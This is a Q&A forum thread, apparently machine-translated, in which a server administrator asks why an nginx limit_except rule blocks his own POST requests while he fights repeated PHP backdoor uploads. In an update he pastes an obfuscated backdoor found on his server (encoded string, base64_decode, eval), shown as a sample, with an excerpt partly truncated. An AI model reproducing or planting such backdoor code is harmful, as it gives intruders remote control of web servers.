Answer the question
In order to leave comments, you need to log in
D
D
DIvan4ik2014-12-10 14:54:36
DIvan4ik, 2014-12-10 14:54:36
How to disable POST requests to nginx for everyone except yourself?
Good time of the day!
There is a debian server with ISP manager 5 Lite installed. Spinning nginx + apache itk
on the server several sites on different CMS: Wordpress, Joomla, OpenCart, GetSimple... Sites are mostly new but there are also old ones. Even on Joomla 1.5.x.
Access is filtered by iptables, persons who have access are trusted.
I manage everything personally, well, or "almost" personally. The sites have a commercial intent and are visited periodically. But apparently they are visited not only by clients, but also by intruders ... Through a yet unknown hole on the server , php "Backdoors" are constantly (no, really, constantly, and most likely manually) uploaded, through which all sorts of horrors are happening.
Thought: "How long"? and found a solution :
Here is the main location of the ngingx site config file:
location / {
location ~ [^/]\.ph(p\d*|tml)$ {
limit_except GET {
allow <<МОЙ_ИП>;
deny all;
}
try_files /does_not_exists @fallback;
}
location ~* ^.+\.(jpg|jpeg|gif|png|svg|js|css|mp3|ogg|mpe?g|avi|zip|gz|bz2?|rar|swf)$ {
expires 7d;
try_files $uri $uri/ @fallback;
}
location / {
limit_except GET {
allow <МОЙ_ИП>;
deny all;
}
try_files /does_not_exists @fallback;
}
}The request type filtering rule WORKS and everything would be fine, BUT blocks POST from my ip in addition.
The logs are clear:
<МОЙ_ИП> - - [10/Dec/2014:11:40:06 +0300] "POST /index.php?option=com_rsform&Itemid=3 HTTP/1.1" 405Why is my POST not getting passed too? Day 3 I'm suffering...
UPD is not a Shell, but a Backdoor of the form:
<?php
$vGSDSHL = Array('1'=>'6', '0'=>'A', '3'=>'e ', '2'=>'a', '5'=>'y', '4'=>'v', '7'=>'H', '6'=>'p', '9' =>'l', '8'=>'r', 'A'=>'t', 'C'=>'G', 'B'=>'3', 'E'=>'1' , 'D'=>'2', 'G'=>'i', 'F'=>'o', 'I'=>'B', 'H'=>'n', 'K'= >'M', 'J'=>'C', 'M'=>'8', 'L'=>'T', 'O'=>'u', '
function vZAHTCQ($v0ZDJ0Q, $vE54PQG){$vGJMOEG = ''; for($i=0; $i < strlen($v0ZDJ0Q); $i++){$vGJMOEG .= isset($vE54PQG[$v0ZDJ0Q[$i]]) ? $vE54PQG[$v0ZDJ0Q[$i]] : $v0ZDJ0Q[$i];}
return base64_decode($vGJMOEG);}
$v3MWBN6 = 'XCQEVCznPCQxP50aUJUZNYWfhCKBKDiGNYuZKkufhYuEhbUZNkUEhLuDNyUDv'.
'GUpJjFuvDawtBUjcs0GUDibNsUpJGiuhyhzVyrfqDQkVC94tG0aUJVC2yr9PfEztGPpJGiuhyhzVyrfqBdxhdaz2b'.
'QRUYfjV7XEhLwmXCi9hbQEt7invDzzPHN9VJ0aUJVq2yZutBVxlLW5NLWHegFmoC9O2d'.
'axhqoFXDd5Pba5qDr4h5PwL9dKLJupJuI6tb9nPDdfmJVwtDVnhqX5tBXxX5ggmLwmoC9O2dax'.
'hqoFXDEz3Qa93CdkVqi6tDZnVC9AhsPwKJupJuIxhqinVC9Ahdaw2yE6VJjgmLwmo7N9VQaAvy'.
'V6vEarVyafhqNnPHdOVC9AhsjgmLwmoCi9hb9OhsjHdENcqEhQT9NX'.
'
'wmUJ0jUChEtbNf2yaOUQVLLBNfPb9gPDrzPDz9P5juvqX5vqu6U7wmUJ0jUJ'.
'0jUJI5hqiEPbRj2qNnvqX5vquFXCQ5PbQZms0/UCQ5PbQZqDEzPJjHdENcPBi52qIxtCQx2CdxX5gj'.
'XCQ5PbQZms01U7NfPb9gPDrzPDz9P5juvqX5vqu6egFjUJ0jnoFjUJ'.
'0jXQaoLENTUYfjdENcPBi52qIxtCQx2CdxmJinTWaLdJupJG0jUJ0uqfNcLfAXis0aUQ'.
'VLLBNfPb9gPDrzPDz9P5juqfNcLfAXisupJHfmJbhEtbNf2yaOU7Vxtfr4hD9'.
'OmJuj3gFjUJ0j2CdzhCd5mJVUdQiolxWOKJ0fKYojLbafUWh4VyZuX5upJG0jUJIu2yTFUko'.
'gNJU6eg6aJj6bVyZkVC94tGIqTfaxhqiktDa82yTFXCwwUJiDmsIpJG0jUJ0uqfNcLfAXidwu2Efjcs0uVkwmUJ0jU7N9VCN4tD'.
'A6hsju25gjX7v6eg6aJj66hGjzhyEgV7uFXCQEVCznPCQxP5u6U7wmUJ0jUC9bm'.
'C9xPDdfmJinTWaLdQwHPCQxP5VVms0bXG0FtyoEmJinTWaLdQwHPCQxP5VVms0acs0uvqdf2QagvqNxm'.
'sumUJ0jUJ0jUJIqTfaxhqiktDa82yTFtyoEmJinTfdsdudsy5VUdQioqfzcTEoHqsuwUJizV'.
'qiFqBIzPBK6egFmUJ0jUC9bUJjz2qNxhqoFXQaYLfalsTdttyoE'.
'mJinTfdsdudsy5VUdQioqfzcTEoHqs9VmsIMnJ0FXQaYLfalsTdttyoEmJinTfdsdudsy5VUdQioqfzcTEoHqs9VUJWa'.
'UJizVqiFqBIzPBK6moFjUJ0jUJ0jU7Vxtfr4hD9OmJupJHfmJbhEtbNf2yaOUCQkVC94t9X'.
'YmJuj3gFjUJ0j2yvFUT0uqEIcTEitXB0rXEf6U7wmUJ0jUJ0jUJ0uvs0aUCQ5PbQZm0FjUJ0jUJ0jUJ0jUJ0GVyZztyTGUYf+U7'.
'IFPQaEtbQAhsj6l0FjUJ0jUJ0jUJ0jUJ0GPCzgqBh9PHN6tDRGUYf+U7IFP7h9PHN6tDRFmsgmUJ0jUJ0jUJ0jUJ0jUHVx'.
'tEaDhqXx2yaOUG0acGIqTfandudsTf9cLGgmUJ0jUJ0jUJ0jUJ0jUHNzhbdAtDi9UG0acGI02y'.
'Z6qDV9VJjHPDQbhdaAtDi9X5umUJ0jUJ0jUJ06egFjUJ0jUJ0jUCdk2CMjPDd52yQw2q69mJizmLwmUJ0jU7fjhyrxhs'.
'IpJG0jUJ0jUJ0jhqhztJjuqEIcTEitXB0rXEf6egFjUJ0jno6aJb9bmJI9tqIf3sjuqEIcTEitXDWHqsujmoFjU'.
'J0j2yvF2qNxhqoFXCi9hbQEt7invyNf2yaOms0bXGIbVyZkVC94t9a93C9xV7KFXDQkVC94tGPjlG0uhCdbvqdwV'.
'QazvBi6tDR6moFjUJ0jUJ0jUJinTWaLdQwHvsVVUYfjXCi9hbQEt7invyNf2yaOegFjUJ0jhyrxh'.
'oFjUJ0jUJ0jUJinTWaLdQwHvsVVUYfjXEN9vf9OhbMHeg66hGjjUydAP7iZmJinT'.
'WaLdQwHvsVVms0bXGIbVyZkVC94t9a93C9xV7KFXDQkVC94tGPjlG0'.
'uqEIcTEitXDWHqsujmoFjUJ0jvDQwtQaEPDd5qDhEtbKFXDQkVC94tGP'.
'jlG0uqEIcTEitXDWHqsupJbdR2qop';
eval(vZAHTCQ($v3MWBN6, $vGSDSHL));?>
2 answer(s)
@EagleMoor
A
Alexey Volegov, 2014-12-10 @EagleMoor
Probably because you allow yourself only GET
Try It
's a very strange way though. If all shells get through ISP, then give access to it only from work and that's it. From home vpn to work and you will be happy. Well, change the url for the panel.
Similar questions
M
A
1
W
E
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question